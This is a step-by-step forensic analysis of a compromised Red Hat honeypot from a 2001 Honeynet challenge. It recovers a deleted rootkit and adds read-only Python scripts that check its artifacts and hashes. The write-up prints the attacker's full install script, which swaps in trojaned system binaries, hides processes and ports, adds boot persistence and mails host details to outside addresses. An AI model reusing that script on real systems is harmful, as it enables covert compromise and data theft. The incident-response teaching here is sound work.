May 15th, 2001 Honeynet Challenge.
Matt Fiddler <matt.fiddler@hli.com>

Step by Step:

1. Acquire the compressed image from:
http://project.honeynet.org/scans/scan15/honeynet.tar.gz

Record an MD5 of the archive, and of the extracted honeypot.hda8.dd, before doing anything else, so that every later step can be checked against an unaltered copy of the evidence.

2. Mount the image read-only on a Linux system, through the loop device, with nodev, nosuid and noexec so that nothing on the evidence can be executed, or honoured as a device node or set-uid file, by accident:

# mkdir /honeynet
# mount -o ro,loop,nodev,nosuid,noexec honeypot.hda8.dd /honeynet

3. Download and install The Coroner's Toolkit, TCTUTILS and Autopsy. Since the READMEs for all the packages are self-explanatory, I am only including links to these files.

The Coroner's Toolkit http://www.porcupine.org/forensics/tct.html

TCT Utils http://www.cerias.purdue.edu/homes/carrier/forensiscs

Autopsy http://www.cerias.purdue.edu/homes/carrier/forensiscs

4. After the above products are installed, launch autopsy to begin the analysis:

# autopsy 8888 localhost
Autopsy Forensic Browser ver 1.0
Investigator: Quincy
Paste this as your browser URL on localhost:
localhost:8888/3004636400/autopsy

5. Pasting the URL into your browser brings you to the Autopsy main menu.

Select both boxes under the image and click on "Enter the Lab".

You are now presented with a "File" listing of all deleted files on the "/" partition. Scrolling down to the bottom shows the most recently deleted files and directories. From the MAC times we see a single file, lk.tgz, whose modification, access and change times all fall on March 15th, 2001 in "/". (On ext2 the "C" in MAC is the inode change time, ctime, not a creation time; it is set when the inode's metadata changes, which a fresh download followed by deletion does.) This file looks intriguing, so we will recover it for further investigation.

6. Only the inode number of the deleted file is needed to recover it with icat from The Coroner's Toolkit. Note that icat reads the raw image, not the mounted file system, and that the mount from step 2 is read-only, so run it from the directory holding honeypot.hda8.dd and redirect the output into a writable working directory (/work here). Inode 23 is the number Autopsy shows for lk.tgz:

# mkdir /work
# icat honeypot.hda8.dd 23 > /work/lk.tgz
# md5sum /work/lk.tgz
# file /work/lk.tgz

Hash the recovered file before unpacking it, and confirm with file(1) that it really is a gzip-compressed tar archive before trusting its name.

7. Unpacking the archive (cd /work && tar xzf lk.tgz) creates a directory named last with the following contents:

# ls -ltr /work/last

total 1472

-rwxr-xr-x 1 1031 users 1345 Sep 9 1999 cleaner*
-rw------- 1 1031 users 512 Oct 22 2000 ssh_random_seed
-rw-r--r-- 1 1031 users 344 Oct 22 2000 ssh_host_key.pub
-rw------- 1 1031 users 540 Oct 22 2000 ssh_host_key
-rw-r--r-- 1 1031 users 880 Oct 22 2000 ssh_config
-rw-r--r-- 1 1031 users 3278 Jan 27 10:11 inetd.conf
-rw-r--r-- 1 1031 users 11407 Jan 27 10:11 services
-rwxr-xr-x 1 1031 users 632066 Feb 26 09:46 mkxfs*
-rwx------ 1 1031 users 7165 Feb 26 10:22 linsniffer*
-rwxr-xr-x 1 1031 users 4060 Feb 26 10:22 sense*
-rwx------ 1 1031 users 8268 Feb 26 10:22 sl2*
-rwxr-xr-x 1 1031 users 4620 Feb 26 10:23 last.cgi*
-rwxr-xr-x 1 1031 users 33280 Feb 26 10:23 ps*
-rwxr-xr-x 1 1031 users 35300 Feb 26 10:23 netstat*
-rwxr-xr-x 1 1031 users 19840 Feb 26 10:23 ifconfig*
-rwxr-xr-x 1 1031 users 53588 Feb 26 10:23 top*
-rwx------ 1 1031 users 75 Feb 26 10:24 logclear*
-rwxr-xr-x 1 1031 users 79 Feb 26 10:28 lsattr*
-rw-r--r-- 1 1031 users 688 Feb 26 10:29 sshd_config
-rw-r--r-- 1 1031 users 1 Feb 26 10:29 pidfile
-rw-r--r-- 1 root root 708 Mar 2 22:05 s
-rwx------ 1 1031 users 3713 Mar 2 22:08 install*
-rwxr-xr-x 1 1031 users 611931 Feb 8 2002 ssh*

We have found the contents of our rootkit!

A quick cat of the install script lets us follow the installation of this rootkit on the compromised system. The script is reproduced below verbatim, as recovered. Its status messages are in Romanian; the ones that matter read roughly as follows: "Instalarea Rootkitului A Pornit La Drum" = "the rootkit installation is under way"; "Multumiri La Toti Care M-Au Ajutat" = "thanks to everyone who helped me" (the line between these two is a crude insult aimed at one "Mircea"); "Are Make !" / "Nu Are Make !" = "has make!" / "no make!" (likewise for gcc and ssh); "Inlocuim nestat ... alea alea" = "replacing netstat ... and the rest"; "Gata" = "done"; "Facem Director...Si Mutam Alea" = "making the directory... and moving the stuff"; "Copiem ssh si alea" = "copying ssh and the rest"; "Adaugam In Startup" = "adding to startup"; "Luam Informatiile dorite" = "collecting the wanted information"; "Spatiu Liber" = "free space"; "Gata ! Trimitem Mailul ...Asteapta Te Rog" = "done! sending the mail ... please wait"; "placinte" = "pies"; "Am trimis mailul ... stergem fisierele care nu mai trebuie" = "mail sent ... deleting the files that are no longer needed".

# cat /work/last/install

#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm
>/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz

8. Returning to the deleted-file listing in Autopsy, the last directory itself also shows up as deleted from the "/" partition. That matches the final lines of the script (cd / followed by rm -rf last lk.tgz computer lk.tar.gz): together with the MAC times on lk.tgz it tells us the archive was unpacked on the victim, and the deletion of last and lk.tgz is consistent with the script having run through to its last line. But the question remains: was the rootkit actually installed?

9. Following through the install script and checking its effects against the deleted and live files Autopsy shows, you can quickly determine that the rootkit was in fact installed on this system.
The quick correlation I used was the creation of the file /dev/last referenced in the install script:

<snip>
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
</snip>

Traversing the /dev directory in the Autopsy file browser locates this file, and an Autopsy ASCII report of /dev/last can be compared line by line with the nine echo lines above. The contents of /dev/last and its neighbour /dev/rpm are evidently the hide-lists read by the trojaned netstat and ps that the script installs just before writing them: /dev/rpm names processes to hide (sl2, sshdu, linsniffer, smurf, slice, mech, muh, bnc, psybnc), and /dev/last holds address prefixes (type 1) and ports (types 3 and 4) to hide from netstat, the same layout as the classic Linux Root Kit (LRK) configuration files. Other artifacts the script leaves, each worth confirming the same way: the replaced /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top; mkxfs in /usr/sbin (very likely a renamed sshd, since the kit ships sshd_config, ssh_host_key, ssh_random_seed and a pidfile alongside it, and /dev/rpm hides a process called sshdu); the hidden directories /dev/ida/.drag-on and /dev/ida/".. " with linsniffer, the other tools and their tcp.log files; the line "/usr/bin/lsattr -t1 -X53 -p" appended to /etc/rc.d/rc.sysinit together with the 79-byte replacement /usr/bin/lsattr, made mode 500 and immutable with chattr +i, which is the reboot persistence hook; last.cgi in whichever cgi-bin directory exists; and the replaced /etc/inetd.conf and /etc/services, after which inetd is sent a HUP. Two details of the script are also worth noting: the sshd check tests /usr/sbin/sshd/ with a trailing slash, so it always reports "Nu Are Ssh" whether or not sshd is present, and HISTFILE is unset at the top, so do not expect the attacker's commands in root's shell history.
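As an added example (not part of the original write-up, and not code from the rootkit or from Autopsy), the following Python script turns the correlation in steps 8 and 9 into a repeatable check: it parses the commands in the recovered install script that leave files behind, maps each target onto the read-only mount from step 2, and reports what is present, what is missing, and, for /dev/rpm, /dev/last and rc.sysinit, whether the lines the script appends are really there. INSTALL_EXCERPT is a constructed excerpt of the script shown in step 7, sample_image() builds a throwaway directory tree standing in for /honeynet, and the file name check_artifacts.py is an assumption; point it at the real mount point to run it against the evidence.

```python
"""Added example: correlate the recovered install script with a read-only
mount of the image (not code from the original write-up)."""
import os
import re
import shlex
import sys
import tempfile

# Constructed excerpt of last/install (step 7); the remaining lines of the real script have these same shapes.
INSTALL_EXCERPT = r'''
mv ifconfig /sbin/ifconfig
mv netstat /bin/netstat
cp -f mkxfs /usr/sbin/
touch /dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
touch /dev/last
echo "1 193.231.139" >>/dev/last
echo "3 48744" >>/dev/last
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
touch /dev/ida/.drag-on/tcp.log
cp -f inetd.conf /etc
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
'''
APPEND_RE = re.compile(r'echo\s+"(.*)"\s*>>\s*(\S+)$')

def parse_install(script):
    """File-system effects, in order: ("mv"|"cp", src, dest),
    ("touch"|"mkdir", path), ("append", path, text) for echo "text" >> path."""
    effects = []
    for raw in script.splitlines():
        line = raw.strip()
        m = APPEND_RE.match(line)
        if m:
            effects.append(("append", m.group(2), m.group(1)))
            continue
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: not a command we track
            continue
        args = [a for a in argv[1:] if not a.startswith("-")]
        if argv and argv[0] in ("mv", "cp") and len(args) >= 2:
            for src in args[:-1]:  # cp a b c dir/ copies every source
                effects.append((argv[0], src, args[-1]))
        elif argv and argv[0] in ("touch", "mkdir") and args:
            effects.append((argv[0], args[0]))
    return effects

def on_image(root, path, src=None):
    """Victim path -> path under the mount point. For mv/cp, a destination that
    is a directory (trailing slash, or a directory on the image) gets basename(src)."""
    p = os.path.join(root, path.lstrip("/"))
    if src is not None and (path.endswith("/") or os.path.isdir(p)):
        p = os.path.join(p, os.path.basename(src))
    return p

def check_image(root, script=INSTALL_EXCERPT):
    """{victim_path: "present"|"missing"} for files and directories the script
    creates; "matches"|"differs" for files it appends to, by expected lines."""
    report, expected = {}, {}
    for eff in parse_install(script):
        if eff[0] == "append":
            expected.setdefault(eff[1], []).append(eff[2])
            continue
        p = on_image(root, eff[2], eff[1]) if eff[0] in ("mv", "cp") else on_image(root, eff[1])
        report["/" + os.path.relpath(p, root)] = "present" if os.path.lexists(p) else "missing"
    for path, lines in expected.items():
        p = on_image(root, path)
        key = "/" + os.path.relpath(p, root)
        if not os.path.isfile(p):
            report[key] = "missing"
            continue
        with open(p, encoding="utf-8", errors="replace") as fh:
            actual = fh.read().splitlines()
        report[key] = "matches" if all(l in actual for l in lines) else "differs"
    return report

def sample_image():
    """Constructed stand-in for /honeynet: /bin/netstat and most .drag-on
    files are absent and /dev/last holds something else, to show the misses."""
    root = tempfile.mkdtemp(prefix="hda8-")
    for d in ("sbin", "bin", "usr/sbin", "usr/bin", "etc/rc.d", "dev/ida/.drag-on", "dev/ida/.. "):
        os.makedirs(os.path.join(root, d))
    files = {"sbin/ifconfig": "trojan", "usr/sbin/mkxfs": "trojan", "usr/bin/lsattr": "trojan",
             "etc/inetd.conf": "# replaced", "dev/ida/.drag-on/tcp.log": "",
             "dev/ida/.drag-on/linsniffer": "trojan", "dev/rpm": "3 sl2\n3 linsniffer\n",
             "dev/last": "1 10.0.0\n",
             "etc/rc.d/rc.sysinit": "#!/bin/sh\n# stock content ...\n/usr/bin/lsattr -t1 -X53 -p\n\n"}
    for name, body in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":  # python3 check_artifacts.py /honeynet
    for path, status in sorted(check_image(sys.argv[1] if len(sys.argv) > 1 else sample_image()).items()):
        print(f"{status:8} {path}")
```

The report is keyed by victim path, so the /dev/ida/".. " directory shows up with its trailing space, which is exactly the kind of name that is easy to miss in a casual ls. The script only reads; still, run it against the read-only mount rather than a live system, since a live trojaned ps or netstat is precisely what cannot be trusted.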

Further correlation can be made by comparing MD5 checksums of the trojaned binaries with the checksums of the same files on the original Red Hat install media. Use a reference taken from trusted media (or rpm -Vp against the original package files) rather than rpm -V against the image's own RPM database, which an attacker with root could have edited as well.
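As a second added example (again not from the original write-up), the following Python script does that comparison three ways rather than one: each replaced binary on the image is checked against a trusted reference hash and against the copy of the same name in the recovered lk.tgz, so a mismatch is attributed to the rootkit rather than merely flagged. The manifest and both directory trees built by sample_case() are constructed stand-ins; with real data, known_good would come from md5sum over the same package versions on a clean Red Hat install, root would be /honeynet and kit_dir the unpacked last directory.

```python
"""Added example (not from the original write-up): three-way MD5 check of the
binaries the rootkit replaced: trusted reference vs. image vs. recovered kit."""
import hashlib
import os
import tempfile

# Binaries the install script swaps out (step 7).
REPLACED = ["/sbin/ifconfig", "/bin/netstat", "/bin/ps", "/usr/bin/top", "/usr/bin/lsattr"]

def md5_file(path):
    """Streamed MD5, so large binaries are not read into memory at once."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def kit_hashes(kit_dir):
    """MD5 of every regular file in the unpacked rootkit directory, keyed by name."""
    return {n: md5_file(os.path.join(kit_dir, n)) for n in os.listdir(kit_dir)
            if os.path.isfile(os.path.join(kit_dir, n))}

def classify(root, known_good, kit_dir, paths=REPLACED):
    """{victim_path: verdict}:
      clean         matches the trusted reference hash
      rootkit copy  byte-identical to the file of the same name in the kit
      modified      differs from the reference and is not the kit's file
      missing       not on the image
      no reference  nothing trusted to compare against"""
    kit, verdicts = kit_hashes(kit_dir), {}
    for victim in paths:
        on_disk = os.path.join(root, victim.lstrip("/"))
        if not os.path.isfile(on_disk):
            verdicts[victim] = "missing"
            continue
        h = md5_file(on_disk)
        if known_good.get(victim) == h:
            verdicts[victim] = "clean"
        elif kit.get(os.path.basename(victim)) == h:
            verdicts[victim] = "rootkit copy"
        elif victim in known_good:
            verdicts[victim] = "modified"
        else:
            verdicts[victim] = "no reference"
    return verdicts

def sample_case():
    """Constructed data: a mini image, an unpacked-kit directory and a reference
    manifest computed from the 'clean' bytes. Returns (root, known_good, kit_dir)."""
    root, kit = tempfile.mkdtemp(prefix="hda8-"), tempfile.mkdtemp(prefix="last-")
    clean = {p: b"clean " + os.path.basename(p).encode() for p in REPLACED}
    known_good = {p: hashlib.md5(body).hexdigest() for p, body in clean.items()}
    for name in ("ifconfig", "netstat", "ps", "top", "lsattr"):
        with open(os.path.join(kit, name), "wb") as fh:
            fh.write(b"rootkit " + name.encode())
    on_image = {"/sbin/ifconfig": b"rootkit ifconfig",      # swapped in by the script
                "/bin/netstat": b"rootkit netstat",         # swapped in by the script
                "/bin/ps": b"patched by someone else",       # modified, but not the kit's file
                "/usr/bin/top": clean["/usr/bin/top"]}       # untouched; lsattr left absent
    for victim, body in on_image.items():
        full = os.path.join(root, victim.lstrip("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(body)
    return root, known_good, kit

if __name__ == "__main__":
    for victim, verdict in classify(*sample_case()).items():
        print(f"{verdict:13} {victim}")
```

MD5 is used because that is what a 2001-era reference list carries; for a reference you build today, swap hashlib.sha256 into md5_file. The "no reference" verdict matters in practice: a binary with no trusted hash is not evidence of anything either way, and silently treating it as clean is the mistake this layout avoids.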

This completes my step-by-step analysis of the Red Hat system compromised on March 15, 2001, for the May 2001 Honeynet Challenge.